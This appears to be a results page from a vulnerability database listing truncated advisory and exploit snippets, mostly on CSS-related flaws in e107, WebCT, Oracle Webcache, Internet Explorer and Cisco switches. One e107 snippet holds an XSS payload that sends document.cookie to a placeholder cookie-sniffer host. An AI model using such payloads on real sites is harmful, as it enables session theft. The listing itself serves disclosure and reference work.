5731 matches found
[Hat-Squad] i-Gallery directory traversal
Hat-Squad Advisory: i-Gallery directory traversal Product: i-Gallery Vendor Url: http://www.b-cp.com Version: 3.3 older versions not tested , but assumed vulnerable Vulnerability: Directory traversal and CSS bug Release Date: Vendor Status: Informed: 15 June 2005 Second Contact: 19 June 2005...
e107 WebPortal
Hello, Zaraza Type:CSS in forum/ LINK=http://www.site.ru" onclick=document.location.hef='http://hackersite/cgi-bin/cookiesniffer.cgi?'+document.cookie;target="blanksite.ru/LINK IMGjavascript:alert'HELLO, This CSS attack ;'/IMG -- Best regards, B4D$c0Rp mailto:[email protected] 01.06.2005, 22:49...
CVE-2004-1872
Cross-site scripting XSS vulnerability in WebCT Campus Edition 4.1.1.5 allows remote attackers to inject arbitrary web script or HTML via the @import URL function in a CSS style tag...
CVE-2004-1872
CVE-2004-1872 affects WebCT Campus Edition 4.1.1.5 and is a Cross-site Scripting (XSS) vulnerability that allows remote injection of arbitrary script/HTML via the @import URL function in a CSS style tag. The NVD CVSS v2 base score is 4.3 (MEDIUM) with network access, no authentication, and partia...
Cross Site Scripting in Oracle Webcache 9i
Name Cross Site Scripting in Oracle Webcache 9i Systems Affected Oracle Application Server with Webcache 9i Severity Low Risk Category Cross Site Scripting Vendor URL http://www.oracle.com Author Alexander Kornbrust ak at red-database-security.com Date 26 Apr 2005 V 1.00 Advisory AKSEC2003-011 Ti...
remote command execution in includer.cgi script
Tunis 24/04/2005 BUG found by fireboy [email protected] THERE ARE SOME BUGS IN includer.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES IN A SYSTEM OR EXECUTE COMMANDS IN THE TARGET HOST WICH CAN COMPROMISE IT. IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE 1file showing...
MS Internet Explorer "mshtml.dll" CSS Parsing Buffer Overflow
Exploit for unknown platform in category remote exploits ============================================================= MS Internet Explorer "mshtml.dll" CSS Parsing Buffer Overflow ============================================================= / The exploit will create a .CSS file that should be...
MS Internet Explorer ""mshtml.dll"" CSS Parsing Buffer Overflow
No description provided by source. / Taken from http://www.securiteam.com/exploits/5NP042KF5A.html The exploit will create a .CSS file that should be included in an HTML file. When a user loads the HTML file, Internet Explorer will try to parse the CSS and will trigger the buffer overflow. /...
Microsoft Internet Explorer - mshtml.dll CSS Parsing Buffer Overflow
Microsoft Internet Explorer - mshtml.dll CSS Parsing Buffer Overflow / Taken from http://www.securiteam.com/exploits/5NP042KF5A.html The exploit will create a .CSS file that should be included in an HTML file. When a user loads the HTML file, Internet Explorer will try to parse the CSS and will...
Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow
/ Taken from http://www.securiteam.com/exploits/5NP042KF5A.html The exploit will create a .CSS file that should be included in an HTML file. When a user loads the HTML file, Internet Explorer will try to parse the CSS and will trigger the buffer overflow. / //Exploit Code: include include include...
Microsoft Internet Explorer contains a buffer overflow in CSS parsing
Overview A buffer overflow vulnerability exists in the way that Microsoft Internet Explorer processes Cascading Style Sheets CSS. This may allow an attacker to execute arbitrary code or cause a denial of service. Description CSS is a mechanism for adding style to web documents. Microsoft Internet...
CVE-2004-0842
The CVE-2004-0842 issue affects Internet Explorer 6.0 SP1 and earlier (Windows platforms) and is caused by an unchecked buffer in CSS parsing that can trigger heap memory corruption via crafted CSS (for example, the “@;/*”” sequence). Successful exploitation could lead to remote code execution or...
Mozilla Firefox 3.x < 3.0.1 Multiple Vulnerabilities
Binary data 4591.prm...
Mozilla Firefox < 2.0.0.16 / 3.0.1 Multiple Vulnerabilities
Binary data 4588.prm...
Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption
Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption source: https://www.securityfocus.com/bid/10382/info A vulnerability identified in Internet Explorer may allow an attacker to cause the application to crash. The issue presents itself when the browser attempts to process an HTM...
Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption
source: https://www.securityfocus.com/bid/10382/info A vulnerability identified in Internet Explorer may allow an attacker to cause the application to crash. The issue presents itself when the browser attempts to process an HTML page containing a table and loads a css style sheet from a file. Thi...
WebCT Campus Edition 4.1 - Cross site scripting using CSS @import
Name: WebCT Campus Edition 4.1 - Cross site scripting using CSS @import Release date: 2004/03/29 Application: WebCT Campus Edition 4.1 4.1.1.5, possibly others Vendor URL: http://www.webct.com/ WebCT Inc. Author: Simon Boulet simon boulet divahost net Legal Notice: -------------------- This...
CVE-2004-1872
Cross-site scripting XSS vulnerability in WebCT Campus Edition 4.1.1.5 allows remote attackers to inject arbitrary web script or HTML via the @import URL function in a CSS style tag...
CVE-2004-0352
The vulnerability CVE-2004-0352 affects Cisco 11000 Series Content Services Switches running WebNS. Specifically, WebNS 5.0(x) before 05.0(04.07)S and 6.10(x) before 06.10(02.05)S are susceptible. A remote attacker can trigger a denial of service (device reset) by sending a malformed UDP packet t...
Cisco Security Advisory: Cisco CSS 11000 Series Content Services Switches Malformed UDP Packet Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Cisco CSS 11000 Series Content Services Switches Malformed UDP Packet Vulnerability Revision 1 For Public Release 2004 March 4 at 1700 UTC GMT ---------------------------------------------------------------------- Contents...